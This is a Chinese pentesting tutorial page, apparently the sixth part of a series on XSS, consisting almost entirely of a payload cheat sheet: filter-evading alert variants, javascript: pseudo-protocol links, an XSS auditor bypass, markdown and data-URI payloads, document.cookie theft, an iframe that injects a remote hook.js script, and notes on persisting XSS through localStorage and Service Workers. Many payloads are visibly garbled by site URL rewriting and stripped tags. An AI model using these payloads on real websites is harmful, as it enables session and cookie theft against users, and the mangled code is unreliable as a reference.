渗透测试XSS跨站攻击检测手法( 六 ) _XSS跨站攻击

3.2.9.3. 各种alert

<>alert(1)</>
<>confirm(1)</>
<>prompt(1)</>
<>alert('1')</>
<>alert("1")</>
<>alert`1`</>
<>(alert)(1)</>
<>a=alert,a(1)</>
<>[1].find(alert)</>
<>top["al"+"ert"](1)</>
<>top["a"+"l"+"e"+"r"+"t"](1)</>
<>top[/al/.source+/ert/.source](1)</>
<>top[/a/.source+/l/.source+/e/.source+/r/.source+/t/.source](1)</>

3.2.9.4. 伪协议

<a href=https://www.isolves.com/it/aq/fwq/2019-10-08/java:/0/,alert(%22M%22)>M
<a href=https://www.isolves.com/it/aq/fwq/2019-10-08/java:/00/,alert(%22M%22)>M
<a href=https://www.isolves.com/it/aq/fwq/2019-10-08/java:/000/,alert(%22M%22)>M
<a href=https://www.isolves.com/it/aq/fwq/2019-10-08/java:/M/,alert(%22M%22)>M

3.2.9.5. Chrome XSS auditor bypass

?param=https://&param=@z.exeye.io/import%20rel=import%3E
<base href=https://www.isolves.com/it/aq/fwq/2019-10-08/java:/M/>M
<base href=https://www.isolves.com/it/aq/fwq/2019-10-08/java:/M/>

3.2.9.6. 长度限制
<>s+="l"</>
...
<>eval(s)</>
3.2.9.7. jquery sourceMappingURL
</textarea><>var
a=1//@ sourceMappingURL=//xss.site</>
3.2.9.8. 图片名
"><img src=https://www.isolves.com/it/aq/fwq/2019-10-08/x =alert(document.cookie)>.gif
3.2.9.9. 过期的payload

src=https://www.isolves.com/it/aq/fwq/2019-10-08/java:alert基本不可以用
css expression特性只在旧版本ie可用

3.2.9.10. css
<div style="background-image:url(java:alert(/xss/))">
<STYLE>@import'域名/xss.css';</STYLE>
3.2.9.11. markdown

[a](java:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie)) <JavaScript:alert('XSS')>
![a'"`=prompt(document.cookie)](x)
[notmalicious](java:window.=alert;throw%20document.cookie)
[a](data:text/html;,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=)
![a](data:text/html;,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=)

3.2.9.12. iframe
<iframe ='
var sc = document.("scr" + "ipt");
sc.type = "text/javascr" + "ipt";
sc.src = https://www.isolves.com/it/aq/fwq/2019-10-08/"域名/js/hook.js"; document.body.(sc);
'
/>

<iframe src=https://www.isolves.com/it/aq/fwq/2019-10-08/java:alert(1)>
<iframe src="data:text/html,<iframe src=java:alert('M')></iframe>"></iframe>
<iframe src=data:text/html;,PGlmcmFtZSBzcmM9amF2YXNjcmlwdDphbGVydCgiTWFubml4Iik+PC9pZnJhbWU+></iframe>
<iframe srcdoc=<svg/onload=alert(1)>></iframe>
<iframe src=https://baidu.com width=1366 height=768></iframe>
<iframe src=https://www.isolves.com/it/aq/fwq/2019-10-08/java:alert(1) width=1366 height=768>

3.2.9.13. form

<form action=java:alert(1)><input type=submit>
<form><button formaction=java:alert(1)>M
<form><input formaction=java:alert(1) type=submit value=https://www.isolves.com/it/aq/fwq/2019-10-08/M>
<form><input formaction=java:alert(1) type=image value=https://www.isolves.com/it/aq/fwq/2019-10-08/M>
<form><input formaction=java:alert(1) type=image src=https://www.isolves.com/it/aq/fwq/2019-10-08/1>

3.2.9.14. meta
<META HTTP-EQUIV="Link" Content="<域名/xss.css>; REL=stylesheet">
3.2.10. 持久化
3.2.10.1. 基于存储
有时候网站会将信息存储在Cookie或localStorage，而因为这些数据一般是网站主动存储的，很多时候没有对Cookie或localStorage中取出的数据做过滤，会直接将其取出并展示在页面中，甚至存了JSON格式的数据时，部分站点存在 eval(data) 之类的调用。因此当有一个XSS时，可以把payload写入其中，在对应条件下触发。
在一些条件下，这种利用方式可能因为一些特殊字符造成问题，可以使用 String.fromCharCode 来绕过。
3.2.10.2. Service Worker
Service Worker可以拦截http请求，起到类似本地代理的作用，故可以使用Service Worker Hook一些请求，在请求中返回攻击代码，以实现持久化攻击的目的。
在Chrome中，可通过 chrome://inspect/#service-workers 来查看Service Worker的状态，并进行停止。